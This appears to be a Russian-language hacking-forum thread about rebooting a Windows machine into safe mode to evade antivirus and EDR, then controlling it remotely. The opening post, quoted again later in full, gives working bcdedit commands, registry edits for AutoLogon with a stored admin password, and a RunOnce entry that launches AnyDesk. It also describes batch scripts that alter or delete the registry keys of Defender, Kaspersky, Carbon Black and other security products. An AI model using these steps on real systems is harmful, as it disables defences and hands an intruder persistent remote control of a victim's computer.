Статья Ребутаем тачку в safe mode и управляем ей удаленно или как обойти некоторые средства защиты

[sect adept]

Всем привет. В процессе работы по сетям возникала необходимость работы в безопасном режиме. Искал инфу по этому поводу и толкового ничего не было. А именно мне нужно было вогнать тачку в safe mode и управлять ей удаленно. Наткнулся на отчет главного исследователя SophosLabs и решил повторить его действия.
P.S. какой же он конечно хороший человек, что случайно, а может не случайно, помог)

В чем выгода работы под безопасным режимом? Поскольку большинство решений для обеспечения безопасности будут автоматически отключены после загрузки Windows в безопасном режиме, то мы сможем делать все что душе угодно. Итак, приступим

Вогнать тачку в safe mode можно командой:
bcdedit /set {default} safeboot

Далее ребутаем нашу тачку:
shutdown -r -t 0

Но такой способ тривиальный и не подходит для наших целей, так как после ребута мы фактически потеряем доступ к машине по нескольким причинам:
1. если на учетке стоит пароль, то после ребута у нас будет окно для выбора учетки или ввода пароля;
2. если пароля нет, то он ребутнется и покажется рабочий стол, но мы не сможем управлять тачкой, так как нет удаленного доступа.

Данные проблемы решаются следующими способами:
1. Включить AutoLogon в систему, внеся изменения в реестр:
Указываем имя пользователя (должен быть локальным админом)
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName /t REG_SZ /d username /f

Указываем пароль от учетки:
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword /t REG_SZ /d password /f

Включаем AutoLogon:
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AutoAdminLogon /t REG_SZ /d 1 /f

Таким способ, после ребута нашей тачки мы "обходим" ввод пароля и автоматически логинимся с систему. После успешного AutoLogon нам покажется рабочий стол.


2. Отлично, одна проблема решена. Остается другая - у нас попрежнему нет доступа к тачке в сейф моде. Мое решение состоит в том, чтобы после ребута тачки запустить, например, AnyDesk:
Опять вносим изменения в реестр перед ребутом, чтобы после него запустилась любимая Анюта)
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce /v *a /t REG_SZ /d "cmd.exe /c path_to_anydesk"" /f

RunOnce отвечает за программы, запускаемые только один раз при входе пользователя в систему. После этого ключи программ автоматически удаляются из данного раздела реестра.
Программы, которые запускаются в этом разделе, запускаются для всех пользователей в системе.

Теперь необходимо установить и настроить Анюту на подключение, чтобы при коннекте она автоматически подключилась без всяких запросов на подключение и так далее (тавтология, но все же). Можно настроить Аню по данному мануалу.

Теперь, после всех манипуляций, у нас появляется возможность отправить тачку в safe mode и управлять ей удаленно.

P.S. при подключении к Ани указывать айпишник тачки (если нет инета на ней).

Но по ходу работы учел за собой недоработку - как выйти из сейф мода после работы в безопасном режиме?) Открываем cmd от имени админа и пишем следующее:
bcdedit /deletevalue {default} safeboot & shutdown -r -t 0

Данная команда выключаем сейф мод и ребутает машину в "нормальное" состояние.

Для автоматизации всех действий были написаны два .bat файла - для ребута в safe mode и возврат в "нормальное" состояние. Батники запускать от имени админа!

rebooter.bat - ребутает машину в safe mode. Скачать
normalmode.bat - ребутает машину в "нормальное" состояние. Скачать

Так же сценарии в rebooter.bat изменяют или удаляют разделы реестра, принадлежащие определенным средствам защиты конечных точек, включая защитник Windows и продукты от Kaspersky, Carbon Black, Trend Micro, Symantec, Bitdefender и Cylance.

Получается, что безопасный режим не такой и безопасный)

 

[Brejnev]

По -поводу ключей реестра - познавательно.
Если есть доступ к окошкам, то можно через msconfig все это по быстрому провернуть.

 

[sect adept]

По -поводу ключей реестра - познавательно.
Если есть доступ к окошкам, то можно через msconfig все это по быстрому провернуть.

Но в моем случае было удобнее использовать батник и через реестр работать. К тому же, насколько мне известно, через msconfig нельзя установить autorun программы после ребута. Тогда проще использовать батник, чем сначала указывать RunOnce в реестре, а потом через msconfig ребутать. Но кому как удобно)

 

[xrahitel]

https://medium.com/@markmotig/bypass-av-edr-with-safe-mode-975aacecc809https://medium.com/@markmotig/bypass-av-edr-with-safe-mode-975aacecc809

 

[petroglyph]

Так же сценарии в rebooter.bat изменяют или удаляют разделы реестра, принадлежащие определенным средствам защиты конечных точек, включая защитник Windows и продукты от Kaspersky, Carbon Black, Trend Micro, Symantec, Bitdefender и Cylance.

т.е до того как загрузится в сейфмод оно попытается отредактировать ветки реестра?
Процесс же сразу убьется любым ав, зачем это если после загрузки в сейфмод они сами отвалятся?(И их можно будет отключить без самозащиты от ав)

 

[sect adept]

https://medium.com/@markmotig/bypass-av-edr-with-safe-mode-975aacecc809https://medium.com/@markmotig/bypass-av-edr-with-safe-mode-975aacecc809

Я и написал, что увидел отчет главного исследователя SophosLabs и решил повторить

 

[sect adept]

т.е до того как загрузится в сейфмод оно попытается отредактировать ветки реестра?
Процесс же сразу убьется любым ав, зачем это если после загрузки в сейфмод они сами отвалятся?(И их можно будет отключить без самозащиты от ав)

Ну да кстати, логично, просчитался немного)

 

[Stupor]

Из всех "подозрительных" для АВ ключей тут только RunOnce, но и он настроен на легитимный белый софт если - то может пройти.

 

[The CaT]

Чувак ты ёб..ый? AnyDesk и так ребутит в безопасный режим и управляется нормально всё, понаписал какой то х...ни.

key dlya Any desk dai,pozalysta
ile est kakay staraya versiay?
bez rege Anydesk neperegryzaet v bezopasnyi mod

 

[sect adept]

Чувак ты ёб..ый? AnyDesk и так ребутит в безопасный режим и управляется нормально всё, понаписал какой то х...ни.

как тебе и ответили, нужен кей для ани. Про данную тему не чекал с аней на момент написания. Говорю же, вдохновился отчетом и решил сделать свое решение, как я это видел. Если это для тебя были очевидные вещи, то зачем пишешь сюда?

 

[wav]

ключ для ани вовсе не нужен, если он установлен на вашей машине и вы его юзали месяц то да будет просить зарегать его и не будет использоваться, просто его удалить удалить все следы от него и запускать портабл версию без инстала и никакие ключи он не будет требовать, внутри сети также можно подключаться по айпи без айди даже если нету конекта к сети деска. разжувал тебе и в рот положил ))))

 

[klarkxxx]

Всем привет. В процессе работы по сетям возникала необходимость работы в безопасном режиме. Искал инфу по этому поводу и толкового ничего не было. А именно мне нужно было вогнать тачку в safe mode и управлять ей удаленно. Наткнулся на отчет главного исследователя SophosLabs и решил повторить его действия.
P.S. какой же он конечно хороший человек, что случайно, а может не случайно, помог)

В чем выгода работы под безопасным режимом? Поскольку большинство решений для обеспечения безопасности будут автоматически отключены после загрузки Windows в безопасном режиме, то мы сможем делать все что душе угодно. Итак, приступим

Вогнать тачку в safe mode можно командой:
bcdedit /set {default} safeboot

Далее ребутаем нашу тачку:
shutdown -r -t 0

Но такой способ тривиальный и не подходит для наших целей, так как после ребута мы фактически потеряем доступ к машине по нескольким причинам:
1. если на учетке стоит пароль, то после ребута у нас будет окно для выбора учетки или ввода пароля;
2. если пароля нет, то он ребутнется и покажется рабочий стол, но мы не сможем управлять тачкой, так как нет удаленного доступа.

Данные проблемы решаются следующими способами:
1. Включить AutoLogon в систему, внеся изменения в реестр:
Указываем имя пользователя (должен быть локальным админом)
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName /t REG_SZ /d username /f

Указываем пароль от учетки:
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword /t REG_SZ /d password /f

Включаем AutoLogon:
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AutoAdminLogon /t REG_SZ /d 1 /f

Таким способ, после ребута нашей тачки мы "обходим" ввод пароля и автоматически логинимся с систему. После успешного AutoLogon нам покажется рабочий стол.


2. Отлично, одна проблема решена. Остается другая - у нас попрежнему нет доступа к тачке в сейф моде. Мое решение состоит в том, чтобы после ребута тачки запустить, например, AnyDesk:
Опять вносим изменения в реестр перед ребутом, чтобы после него запустилась любимая Анюта)
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce /v *a /t REG_SZ /d "cmd.exe /c path_to_anydesk"" /f

RunOnce отвечает за программы, запускаемые только один раз при входе пользователя в систему. После этого ключи программ автоматически удаляются из данного раздела реестра.
Программы, которые запускаются в этом разделе, запускаются для всех пользователей в системе.

Теперь необходимо установить и настроить Анюту на подключение, чтобы при коннекте она автоматически подключилась без всяких запросов на подключение и так далее (тавтология, но все же). Можно настроить Аню по данному мануалу.

Теперь, после всех манипуляций, у нас появляется возможность отправить тачку в safe mode и управлять ей удаленно.

P.S. при подключении к Ани указывать айпишник тачки (если нет инета на ней).

Но по ходу работы учел за собой недоработку - как выйти из сейф мода после работы в безопасном режиме?) Открываем cmd от имени админа и пишем следующее:
bcdedit /deletevalue {default} safeboot & shutdown -r -t 0

Данная команда выключаем сейф мод и ребутает машину в "нормальное" состояние.

Для автоматизации всех действий были написаны два .bat файла - для ребута в safe mode и возврат в "нормальное" состояние. Батники запускать от имени админа!

rebooter.bat - ребутает машину в safe mode. Скачать
normalmode.bat - ребутает машину в "нормальное" состояние. Скачать

Так же сценарии в rebooter.bat изменяют или удаляют разделы реестра, принадлежащие определенным средствам защиты конечных точек, включая защитник Windows и продукты от Kaspersky, Carbon Black, Trend Micro, Symantec, Bitdefender и Cylance.

Получается, что безопасный режим не такой и безопасный)

Можно батники перезалить?

где то ошибка походу, не воркает на 2 машинах проверил

Выполняю эти команды, прописав свои логин и пароль локального админа
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName /t REG_SZ /d username /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword /t REG_SZ /d password /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AutoAdminLogon /t REG_SZ /d 1 /f
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce /v *a /t REG_SZ /d "cmd.exe /c C:\Program Files (x86)\AnyDeskMSI\AnyDeskMSI.exe"" /f
Затем ставлю что бы ребутнулся в сейфмод, ребутаю, и все в сеть комп не возвращается по RDP, в AnyDesk пишет что нев сети клиент и все.

 

[wav]

бывает такое что тачки тупо в сейф моде не загружаются после ребута, не на всех но бывает.

 

[RocketRacoon]

all this can be done with teamviewer if you have creds

 

[klarkxxx]

all this can be done with teamviewer if you have creds

teamviewer отстой вечно лицуху требует. И на ру серверах не работает надо в впн мудрить.